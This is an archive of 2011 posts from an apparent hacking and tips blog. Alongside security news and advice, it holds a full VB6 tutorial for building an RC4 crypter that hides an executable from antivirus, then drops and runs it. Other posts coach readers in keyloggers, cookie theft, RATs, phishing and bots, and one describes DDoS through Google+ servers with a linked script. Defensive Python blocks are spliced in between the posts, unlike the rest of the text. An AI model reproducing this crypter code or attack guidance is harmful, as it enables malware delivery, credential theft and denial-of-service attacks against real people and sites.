Saturday 31 December 2011


HOW TO SEE SOMEONE'S FACEBOOK ALBUMS WITHOUT ADDING HIM/HER ON FACEBOOK

Guys, here's the best trick for you to view all the pics of the person you want to see. I found and tried it myself, so enjoy and keep on reading this page.



After the "id=", type the ID of the person whose pics you wish to see.
Try this and watch the magic.

Friday 30 December 2011


Common Techniques That Describe "How Hackers Hack (Exploit) a Website"



Do you know how hackers hack (exploit) a website? Here are some interesting facts about hackers' "paranormal (ghost)" activities. Hackers have tons of attack mechanisms available, and they pick the one most appropriate to the vulnerability. An exploit is an organized plan.


Hacking a website involves the steps given below:
Learn the hosting server details and its operating system: The hacker first examines the details of the server he is going to hack. The most important detail is the operating system running on it and its type. Using a port scan, he detects all the ports available to attack.
Analyse the website: The hacker analyses the website for loopholes that can be exploited. Typical loopholes are online feedback or inquiry forms, which generally use GET and POST variables and can easily be abused by hackers. He also checks the authentication method used on the web pages for any chance of accessing the web server. A good hacker will walk through nearly every interactive part of a website to gain entry to the server. The hacker also goes through the site's scripts to test for development glitches that are easy to exploit.
Existence of input validation: Input validation is the checking many websites use to decide whether a particular piece of information is safe and valid. Unsafe input is discarded. Negligence in input validation is a major way in for hackers.
Build up the attack: After investigating the entire situation, from the server to the website, and identifying all the loopholes, the hacker builds the attack.
Website hacking tricks used by hackers
There are many hacking techniques used by hackers; a couple of them are explained in detail below.
SQL injection: The hacker executes SQL queries against the database server through the website. Either SQL commands are entered in the fields of feedback or contact-us forms, or queries are inserted into expected parameters.
Cross-site scripting: Inserting malicious content into dynamic pages. Websites with static pages control what the user sees because the pages are read-only. With a cross-site scripting (XSS) vulnerability, the hacker can then transmit the user's private data to another server.
Directory traversal attacks: the ../ (dot dot slash) attack. The website is manipulated into giving access to files on the server. For example, suppose a parameter value contains the path of a specific file. Placing ../ at the start of the parameter value makes the application access the parent directory. A series of ../ can reach the root directory.
Authentication attacks: The hacker looks for legitimate credentials that give entry from the website to the server.
Directory listing: By examining the website's complete directory structure, hackers look for hidden directories that could hold administrative information, which is valuable input for attacks.
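
The directory traversal item above is the easiest one to show from the defender's side. The following is an added example, not code from the original post: a file-serving helper that trusts the parameter, next to a hardened version that canonicalises the path and refuses anything outside the document root. The directory layout and file names are constructed for the demonstration.

```python
import os
import tempfile


def resolve_naive(base_dir, user_value):
    """Vulnerable pattern: the parameter is joined to the base directory
    and used as-is, so ../ sequences or an absolute path walk out of it."""
    return os.path.normpath(os.path.join(base_dir, user_value))


def resolve_checked(base_dir, user_value):
    """Hardened pattern: canonicalise, then require containment."""
    if "\x00" in user_value:
        raise ValueError("NUL byte in path")
    base = os.path.realpath(base_dir)
    # realpath collapses ../ and follows symlinks, so the containment test
    # is made on the path the operating system would actually open.
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the document root")
    return candidate


def demo():
    """Run both helpers over constructed parameter values.

    Returns {value: (naive_escapes_docroot, verdict_of_checked_helper)}.
    """
    results = {}
    with tempfile.TemporaryDirectory() as root:
        docroot = os.path.join(root, "site", "docs")
        os.makedirs(docroot)
        with open(os.path.join(docroot, "help.txt"), "w") as fh:
            fh.write("public")
        with open(os.path.join(root, "secret.conf"), "w") as fh:
            fh.write("private")

        samples = ("help.txt", "sub/../help.txt",
                   "../../secret.conf", "/etc/passwd")
        for value in samples:
            naive = resolve_naive(docroot, value)
            escapes = not naive.startswith(docroot + os.sep)
            try:
                resolve_checked(docroot, value)
                verdict = "allowed"
            except ValueError:
                verdict = "rejected"
            results[value] = (escapes, verdict)
    return results


if __name__ == "__main__":
    for value, outcome in demo().items():
        print(f"{value!r:24} naive escapes={outcome[0]!s:5} checked={outcome[1]}")
```

The check is done after canonicalisation on purpose: filtering the string for "../" before joining misses absolute paths and symlinks, which the containment test catches.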


Thursday 29 December 2011


Researchers Discover Leaks In Pre-Installed Android Apps [News]

You may have heard about a recent surge in Android malware. Still, that malware comes in the form of apps. So long as you watch your permissions, you’re fine. Right?
Wrong. Every Android phone comes with some pre-installed apps, and some more than others. A group of researchers at North Carolina State University were interested to know if these apps, which often can’t be uninstalled by the user, contain security flaws. Eight phones were tested including three from HTC (Legend, EVO 4G, Wildfire S), two from Motorola (Droid and Droid X), the Samsung Epic 4G and Google’s Nexus One/S.




All of the phones were found to have security issues due to pre-installed apps. The most serious of these flaws are capability leaks that allow third-party apps to exploit an interface or service in use by another app without making a permission request of its own. Researchers found it would be possible for malware to wipe out data, send SMS messages, and obtain geo-location data by exploiting pre-installed apps.
What can you do to protect yourself from this threat? The researchers don’t provide any help there, though to their credit, they did contact the companies whose phones they exploited in an attempt to provide them with information.
Since these pre-installed apps often can’t be uninstalled by default, the only complete solution is to root your phone and install a custom ROM. However, as the researchers note in their paper, there is no reason why third-party apps could not contain the same flaws they found in the pre-installed apps they researched.
If you’d like the full story, the paper is currently public. Just be warned – it’s not written for the layman.



Source-author: Matt Smith

Wednesday 28 December 2011

Want to become an Android hacker? Then wait and watch!!



Those who own Android gadgets will soon be able to break into networks and computers for real. That’s because Israeli security firm zImperium is about to launch an app that can search for vulnerable targets and infiltrate them, allowing users to eavesdrop or even “attack” the devices.
The app is called Anti, short for Android Network Toolkit. It was introduced by zImperium at last week’s Defcon hacking conference, and reportedly impressed several attendees for its ease of use and affordability. With Anti, a user can infiltrate Windows machines, devices running an unspecified older version of Android and yes, even iPhones.

Anti will offer a Wi-Fi scanning tool for finding open networks and showing all potential target devices on those networks, as well as traceroute software that can reveal the IP addresses of faraway servers. When a target is identified, the app offers up a simple menu with commands like “Man-In-The-Middle” to eavesdrop on local devices, or even “Attack”. The app is designed to run exploits collected in platforms like Metasploit or ExploitDB, using vulnerabilities in out-of-date software to compromise targets. Anti will debut at the Android Market next week as a free app that can be upgraded for $10 (USD). (Later on I’ll tell you how it can be upgraded.)
The app raises the possibility of dangerous, stealthy attacks. A hacker could, for instance, walk into a coffee shop or a corporate office with his phone and start sussing out machines for data theft or malware infection. But Avraham says Zimperium will ask users in its terms of service to limit their hacking to “white hat” penetration testing.
I’m sure you’re wondering why Google would approve such an app. The answer lies in zImperium’s trade – security. The idea is to use Anti to detect weaknesses in a network or machine so that they can be patched or fixed. But even zImperium knows that Anti can cause serious damage in the wrong hands. The company left a note in the app saying, “Please remember, with great power comes great responsibility. Use it wisely.” Right.


Tuesday 27 December 2011


Download Any Torrent File With IDM (Fully Solved) 



Follow these easy steps:
1. First of all, you have to download the torrent file (.torrent) for the content you want to download.

2. Then just go to the website http://www.torcache.net and upload the torrent file that you have just downloaded and click on the cache! button.
 
3. This will give you a new torrent file. You just have to copy the link of the new torrent file from the opened window.
 
4. Then go to the website http://www.torrific.com, create an account there (in case you don’t have one) and log in to your account. Then paste the address of the new torrent obtained in step 3 and click on the Get button.
 
5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.
 
Now enjoy the ultimate Speed of IDM for downloading torrents too…
Please comment on this if you liked it...
 

Monday 26 December 2011


How a Typical Facebook Scam Works?

If you have been on Facebook for a decent amount of time, you have probably come across video posts on your news wall that have an enticing title and an innocent thumbnail, but upon clicking, the link takes you to a scam website.
How do such scams happen on Facebook and why do they go viral so quickly? If a trusted friend is sharing such links with you, does that mean her Facebook account is hacked or does she have a virus on her computer that is quietly posting these dangerous links on her behalf? Not really.
Matt Jones, who works with the Data & Security team at Facebook, has recorded an informative screencast video where he walks you through the various types of scams that happen on Facebook.com and why they happen. Most scams require Facebook users to copy-paste some JavaScript code into the browser's address bar, and as soon as they do that, the rogue post is automatically published to the walls of all their Facebook friends.


Facebook Scams and XSS

Interestingly, according to Matt, Google Chrome and Safari are the only browsers that are susceptible to this kind of cross-site scripting (XSS) vulnerability while IE and Firefox are relatively safe. And since the malicious JavaScript code is often hidden inside Flash videos, Facebook isn’t able to detect it. Maybe the solution is that they allow video embeds from trusted websites.

Countermeasures:

Tips to avoid Facebook scams are below.
1. Most Facebook scams take the form of videos, so avoid clicking on such video links without verifying them. If you don't know the person who posted the video link on your wall, avoid clicking on that kind of video.

2. Try BitDefender safego.

3. Scan your Facebook account for privacy holes with ReclaimPrivacy (ReclaimPrivacy.org).

4. If you believe you have already fallen victim to a Facebook phishing scam, simply log in and change your password. Otherwise, try to change your Facebook password once a month to avoid Facebook scams.


Sunday 25 December 2011


 What You Need To Know About Android Tablet Security..

As tablets become more popular, they’re serving as stand-ins for computers for some users. Although most people still own a PC, tablets are particularly nice for web browsing and online video, making them common couch-side companions.
This, however, could introduce some issues. If tablets are being used like computers, they could be exposed to the same threats. Which begs the question – how can you deal with Internet security on your Android tablet?

Permissions – Like The Phones

The entry to understanding Android on any device is permissions, and in this respect Android tablets work much like the phones. Heck, this same system isn’t even Android exclusive – Google has already adapted the same idea to Chrome extensions and web apps.


Permissions are very simple. Before you download an app, you are given a list of permissions that app requests of your device. These are not optional – if you download the app, you are agreeing to the permissions. Once permission is given, it can’t be revoked unless you uninstall the app.
You therefore need to be very careful about what you download. Reading permissions can seem annoying – but do it anyway. An app that is malicious can easily get up to mischief without you knowing, and while such instances in the real world remain limited, they do exist.

Downloading An Antivirus App Is A Good Idea

As I point out in virtually every Android Internet security article, antivirus apps for the platform remain a bit of an open question. Comprehensive, objective tests of their ability to defend against threats remain rare.
However, a recent A/V Comparatives study did show that most security apps were able to protect against a test selection of malware threats, and the study goes so far as to recommend that all Android users install antivirus software.

Which one should you download? I’m a fan of Kaspersky’s Tablet Security, and recommend it as a first choice, but it does require a pricey $20/year subscription. That may seem like a lot, and if you want free, Lookout Mobile Security can work well – but keep in mind that the app’s $2.99/month premium option totals to almost $36/year.

Treat It Like A Laptop

When it comes to network security, tablets are much like laptops. They almost always connect to the Internet via Wi-Fi, and are subject to all the security risks that result from that. Fortunately, your Android tablet supports secured wireless connections, and that’s a feature you should always use whenever possible. The concern is that a hacker will be able to obtain your browsing data if you use an unsecured connection, and it applies to tablets just as it does to laptops.
One useful feature is Android’s built-in VPN support, which you’ll find in your tablet’s settings. Just enter the VPN address and your username/password for it, and you’re off! You can use this with many VPN services to provide yourself with secure browsing over unsecured networks.

Use Honeycomb’s Encryption

Android has not been particularly popular with enterprise users because of a general lack of focus on enterprise security, but there have been some inroads made in that direction, one of which is the encryption feature on Honeycomb tablets.



Conclusion

Security for tablets is far from mature, just as the threats that may exploit a tablet are far from mature. There is some degree of security via obscurity available as of now, as many website exploits and viruses simply won’t work against tablets. That’s not going to last forever though. Security threats will become more and more common as the devices themselves become more and more popular. This process will take many years, but hey – it certainly doesn’t hurt to have a head start.




Source-author:Matt Smith


Saturday 24 December 2011


How to install tor in backtrack 4 

Tor is mainly used for anonymous surfing. Personally, I feel that it is better than other proxy tools, but not the best. You can try it on BackTrack.
So you’ve been checking out BackTrack 4, and you want to get your anonymity on? This is assuming you have either installed BT4 to your hard drive or you’re using the VMware version. You can do this on a LiveCD too of course, but your changes won’t stay unless you do some fancy lzm voodoo and burn a new copy of your CD.



First, you need to add the noreply.org repositories to your sources.list. These are the official Tor repositories for Debian-based Linux distributions. Open up a terminal and type:

Code:

nano /etc/apt/sources.list

At the bottom of this file, add these two lines:

Code:

deb http://mirror.noreply.org/pub/tor intrepid main
deb-src http://mirror.noreply.org/pub/tor intrepid main

Save the file. Now download the gpg key, and check the fingerprint:

Code:

gpg --keyserver subkeys.pgp.net --recv 94C09C7F
gpg --fingerprint 94C09C7F

The fingerprint should look like this:

Code:

pub 1024D/94C09C7F 1999-11-10
Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid [jpeg image of size 7974]
sub 1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
sub 2048g/E8F4A328 2003-07-09 [expires: 2010-07-18]

Then add it to your apt-key ring by doing this:

Code:
gpg --export 94C09C7F | sudo apt-key add -

Now update your sources, and install tor and privoxy.

Code:
apt-get update
apt-get install tor privoxy

When this is done you’ll need to change a couple of privoxy settings. In a terminal, edit the privoxy config file:
Code:
nano /etc/privoxy/config

Add this line to the top (including the period at the end):
Code:
forward-socks4a / 127.0.0.1:9050 .
Now we need to disable logs. Find the line “logfile logfile” and add a # at the beginning to comment it out (you can search a file in nano with Ctrl-W). You may want to search the file for the line “jarfile jarfile” and make sure that’s commented out too, but it already is for me. Now exit nano and restart the privoxy service:

Code:
/etc/init.d/privoxy restart
Now head on over to the Torbutton Firefox addon page, install Torbutton, and restart Firefox.
Now head over to the Tor detection page. It should tell you that you’re not using Tor. Click the Tor button in the bottom right corner of Firefox, accept the sad fact that you might leak time zone data, and then press Enter in the address bar to reload the page. Note that you can’t just hit refresh, because you need to make sure Firefox is opening a new socket to check.torproject.org. If all is well, you see the bright green notice “Congratulations. You are using Tor.”

Go forth and be anonymous.
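
The "check the fingerprint" step above is the one that protects the whole install, because an 8-digit key ID such as 94C09C7F can be shared by unrelated keys. The following is an added example, not part of the original walkthrough: it parses the older-style `gpg --fingerprint` listing shown in the post and only accepts it when every key listed carries the full fingerprint printed above. The second key in the collision sample is constructed.

```python
import hmac
import re

# Full fingerprint as printed in the post above.
EXPECTED_FPR = "5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F"

FPR_LINE = re.compile(r"Key fingerprint\s*=\s*([0-9A-Fa-f ]+)")


def normalize(fpr):
    """Drop whitespace, upper-case, and require 40 hex digits."""
    compact = re.sub(r"\s+", "", fpr).upper()
    if not re.fullmatch(r"[0-9A-F]{40}", compact):
        raise ValueError("not a 160-bit fingerprint: %r" % fpr)
    return compact


def short_id(fpr):
    """The 8-hex-digit key ID is just the tail of the fingerprint."""
    return normalize(fpr)[-8:]


def extract_fingerprints(gpg_output):
    """Return every well-formed fingerprint found in a gpg listing."""
    found = []
    for line in gpg_output.splitlines():
        match = FPR_LINE.search(line)
        if not match:
            continue
        try:
            found.append(normalize(match.group(1)))
        except ValueError:
            continue  # truncated or malformed line: never trust it
    return found


def key_is_trusted(gpg_output, expected=EXPECTED_FPR):
    """True only if exactly one key is listed and it matches in full."""
    want = normalize(expected)
    fprs = extract_fingerprints(gpg_output)
    return len(fprs) == 1 and hmac.compare_digest(fprs[0], want)


# Listing copied from the post (uid lines shortened).
SAMPLE_GOOD = """\
pub 1024D/94C09C7F 1999-11-10
Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid Peter Palfrader
sub 1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
"""

# Constructed: a second key whose short ID also ends in 94C09C7F.
SAMPLE_COLLISION = SAMPLE_GOOD + """\
pub 1024D/94C09C7F 2011-01-01
Key fingerprint = 0123 4567 89AB CDEF 0123 4567 89AB CDEF 94C0 9C7F
uid Constructed Example Key
"""

if __name__ == "__main__":
    print("good listing trusted:     ", key_is_trusted(SAMPLE_GOOD))
    print("collision listing trusted:", key_is_trusted(SAMPLE_COLLISION))
```

Run the check on the listing before piping the key into `apt-key add -`; a listing with more than one key for the same short ID is rejected outright.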


Friday 23 December 2011


What Is PPPoE and bridge mode of ADSL Modem

There are two ways to configure an ADSL modem for a broadband connection. One is PPPoE (Point-to-Point Protocol over Ethernet) mode and the other is bridge mode.
PPPoE Mode
In this mode the modem works as a router and the PPPoE session terminates on the WAN port of the router. The PPPoE client is built into the modem, and the IP address allocated by the BRAS server is assigned to the WAN port of the modem. The internal network has to use private IP addresses, and NAT for Internet access happens in the modem. In PPPoE mode the modem is configured in such a way that the user ID and password are stored inside the modem. The Internet connection is established as soon as you switch on the modem.
Bridge Mode
In this mode the modem works as a transparent Ethernet bridge, and therefore you need to run PPPoE client software (for login authentication) on your PC or server. Windows XP systems have this feature built in, but for other operating systems you need to buy it from the market. Some freeware clients like RASPPPoE, Enternet etc. are also available on the Internet.
Both modes can be used, depending on the requirement and application. The main differences are listed here.
PPPoE mode
1. The user ID and password are stored inside the modem.
2. Multiple PCs can be connected. For example, most basic ADSL modems have at least one Ethernet port and one USB port. In PPPoE mode, you can connect one PC to the Ethernet port and one PC to the USB port, which enables simultaneous Internet usage on both PCs.
3. PPPoE mode is more secure.
4. For torrent downloads, the appropriate ports need to be forwarded.
Bridge Mode
1. In bridge mode the user ID and password have to be entered in the dialer on the computer.
2. Only a single PC can be connected.
3. For torrent downloads, port forwarding is not required.
4. Less secure because all the ports are open; a good firewall is needed to avoid virus infection.


Thursday 22 December 2011


How DDoS Works Using Google Plus Servers

A security penetration tester at Italian security firm AIR Sicurezza Informatica has claimed that flaws exist in Google's servers that will allow would-be hackers to exploit the search giant's bandwidth and launch a distributed denial-of-service (DDoS) attack on a server of their choosing.

On the IHTeam Security Blog, Simone Quatrini, also known as R00T.ATI, demonstrates how users can make Google's servers act as a proxy to fetch content on their behalf. Quatrini has written a shell script that will repeatedly prompt Google's servers to make requests to a site of the attacker's choice, effectively using Google's bandwidth rather than their own. The advantage of using Google and making requests through their servers is to be even more anonymous when you attack some site (TOR + this method). The funny thing is that Apache will log Google IPs. But beware: gadgets/proxy? will send your IP in the Apache log; if you want to attack, you’ll need to use /_/sharebox/linkpreview/.

How does it work?


The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
It is possible to request any file type, and G+ will download and show all the content. So, if you parallelize many such requests, it is possible to DDoS any site with Google bandwidth. It is also possible to start the attack without being logged in to G+. If anything, Google will notice [attack attempts] and probably blacklist you.


Download-source-Code: http://www.ihteam.net/advisories/_154785695367_+ddos.sh



 


Wednesday 21 December 2011

Part 2: Server Side
Want to know about website account hacking ,don't know where to start !!


We have already discussed client-side hacking; now we'll discuss


Server Side Hacking






1) Exploiting : Exploiting means finding a vulnerability and using it to your advantage. There are various publicly disclosed vulnerabilities and exploits that you can simply search for on Google and HC. There are various ways to exploit a server; the most common ones are:

1) XSS Cross Site Scripting,
2) RFI, LFI
3) Uploading Shells
4) SQL Injections
5) CSRF
6) Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7) Using Scripts to gain information known as Exploits.

These methods are very vast and cannot be explained in a few lines so I am not explaining them in this guide.


2) Bruteforce Attack : Bruteforcing is using a bruteforcer software to try combinations of words, numbers and symbols to fetch the login of your victim. But this rarely works and you need to have a powerful computer.


3) Reverting Accounts : Here we fool the website's servers into believing that we are the authorized user and the holder of an account. One such vulnerability exists in Hotmail and existed in Facebook. Users just supplied some information about the clients such as last accessed IP address, contacts on the contact list, date of birth, location, etc. With a bit of SE it's not that hard to extract such information from the client.

Tuesday 20 December 2011


Want to know about website account hacking ,don't know where to start !!

OK, now that you have my attention, please read this guide that will burst your bubble, beginner hackers. I am sorry for that.

You CANNOT hack emails or websites with just one or two clicks with some email hacking apps. You need to have proper information about the person that you are hacking. If you see sites that claim that they can hack email accounts within minutes and charge hundreds of dollars for it, just laugh at them and move on. Do not waste money on them as they will be just scamming you.

There are two ways to hack Accounts of a Website.
1) Client  Side hacking 


2) Server Side hacking (we'll discuss it later)




*Client Side Hacking

This method can be done in several ways, depending on what you choose. Client-side hacking is basically hacking the person's PC and extracting information. Antiviruses will detect the APIs, assemblies, etc. and prevent you from infecting them. In this case you need

1) Keylogging : This basically taps all the keystrokes that users type. When user types password you get it. The victim requires to execute the keylogger "server" file in order to be infected.

2) Password Stealing : Here you steal password saved on user's pc. Browsers often save passwords to provide quick login to the user, but this can be harmful sometimes. Here same as keyloggers you need to execute a file on client pc. You can use combination of keylogger and password stealers, such as my Emissary Keylogger/Stealer.

3) Cookie Stealing : Here you are stealing cookies of the user. Cookies can be used to auto login as they hold information about the account.

4) Remote Administration Tools : These tools are very dangerous and give you full control of a computer. You can view webcams, desktops live, transfer and download files.

5) Social Engineering : Social Engineering is nothing but fooling someone to download your malware or extracting sensitive information from them.
One of the methods is this : Hacking Accounts through SE.


6) Phishing Attacks : Phishing is creating fake login pages similar to that of a website's login page and then fooling the person to enter their username and password into the login box. The triggered php scripts shall send the entered passwords to your log file.

7) Zombies/Bots : This is like keylogging and password stealing: if the victim executes your malware, he or she can be infected with a bot. A bot will connect them to your IRC channel or host server and make them your "Zombie". You can do whatever you want with them.

That covers the client part.


Recover Deleted Files on Android Phone with Undelete

There are many instances where we might have deleted files and photos accidentally or because of a program or application crash. There are many free apps for Windows which can recover deleted files, like Power Data Recovery, Restore Deleted Files Now, RecoveryDesk etc. Now we have a nice app for Android phones, called Undelete, which can recover deleted files on your Android phone. Undelete for Android is an application which works on rooted phones and allows users to recover deleted files on the SD card and internal storage.

 


Features:
  • Supports FAT
  • Extremely fast scanning logic
  • Restore any file that has not been written over
  • Works with images, video, music, archives and binaries
  • Cool minimal UI
The app is currently in beta and available free of cost in Android market. The app has been tested on Android phones like Incredible S, Nexus S, Xoom, Transformer, Sensation, Galaxy S I/II, Galaxy Ace, Desire. But it should work on Android phones with version 2.1 and up.
Download Undelete [Via XDA Developers]



Monday 19 December 2011

Already know what a crypter is? Then wait, and learn how to make one on your own without any third-party software!
Solution:
Requirement:
 

  • Visual Basic 6 or Visual Basic 6 Portable
  • A RC4 module
  • A brain

The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion


1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behavior of existing code, and then it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, let's start on the builder. Add an RC4 module, and let's go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, let's add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, let's double click the button that says "Browse" or "...". Add this code, and I'll explain it.


Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might get an error telling you that FileSplit and Pass are not declared. To fix that, we will add the declarations at the top of the code.
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, let's start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398
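
From the defender's side, the builder described in this tutorial leaves a recognisable layout on disk: stub bytes, the literal delimiter `<@#@>`, then an encrypted payload that looks like random data. The following is an added example, not part of the original tutorial: a triage check that looks for that delimiter and measures the Shannon entropy of what follows it. The 7.0 bits-per-byte threshold, the minimum payload size and all sample bytes are assumptions made for the demonstration.

```python
import hashlib
import math
from collections import Counter

FILE_SPLIT = b"<@#@>"       # delimiter constant used by the tutorial's builder
ENTROPY_THRESHOLD = 7.0     # assumed cut-off, bits per byte
MIN_PAYLOAD = 256           # assumed: ignore tiny trailers, entropy is noisy


def shannon_entropy(data):
    """Entropy in bits per byte; 8.0 means indistinguishable from random."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def inspect_file_bytes(data):
    """Report whether data has the stub + delimiter + high-entropy layout."""
    report = {"delimiter": False, "payload_len": 0,
              "entropy": 0.0, "suspicious": False}
    offset = data.find(FILE_SPLIT)   # first occurrence, as the stub's Split() uses
    if offset < 0:
        return report
    payload = data[offset + len(FILE_SPLIT):]
    report["delimiter"] = True
    report["payload_len"] = len(payload)
    report["entropy"] = shannon_entropy(payload)
    # Compressed data is also high-entropy, so this is a triage signal
    # that sends the file for closer analysis, not a verdict.
    report["suspicious"] = (len(payload) >= MIN_PAYLOAD
                            and report["entropy"] >= ENTROPY_THRESHOLD)
    return report


def _pseudo_random(n_blocks):
    """Constructed stand-in for ciphertext: deterministic hash output."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest()
                    for i in range(n_blocks))


# Constructed samples (not real executables).
_STUB = b"MZ" + b"\x00" * 200 + b"This program cannot be run in DOS mode." * 10
SAMPLE_CRYPTED = _STUB + FILE_SPLIT + _pseudo_random(128)      # 4096 random-looking bytes
SAMPLE_BENIGN = _STUB + FILE_SPLIT + b"name=value; " * 200     # delimiter, plain text after
SAMPLE_NO_DELIM = _STUB + _pseudo_random(128)                  # no delimiter at all

if __name__ == "__main__":
    for name, blob in (("crypted", SAMPLE_CRYPTED),
                       ("benign", SAMPLE_BENIGN),
                       ("no delimiter", SAMPLE_NO_DELIM)):
        print(name, inspect_file_bytes(blob))
```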


Sunday 18 December 2011


 Proxy Detection Services 

So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the use of proxies or spoofed IPs by users transacting online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though a user's use of a proxy address is not a direct indication of fraudulent behaviour, it can often indicate the user's intention to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.

How Does Proxy Detection Work?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm its authenticity.
The proxy detection service, in turn, compares this IP against a list of flagged IPs known to belong to proxy services. If the IP is not on the list, it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported as a suspected proxy. These proxy detection services work continuously to collect the lists or ranges of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.

How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click the “Lookup IP Address” button to check the IP address.

Enable built-in admin account in Windows 7

==============
1. Click Start, click "All Programs", then find and open the "Accessories" folder.
2. Right-click the "Command Prompt" item and select "Run as administrator".
3. Type the following command line into the window that opens.

net user administrator /active:yes
==============


Note: There is a space between "Administrator" and "/active:yes".

Saturday 17 December 2011


How to Detect Anonymous IP Addresses


Fraudsters are becoming more sophisticated at bypassing Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, so it has become necessary to have a means of detecting proxies so that the authenticity of users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain online privacy. However, proxies are more widely used by online fraudsters to engage in cyber crimes, since it is the easiest way to hide their actual Geo-location, such as city/country, behind a spoofed IP address. Following are some examples where fraudsters use proxies to hide their actual IP.

1. Credit Card Frauds
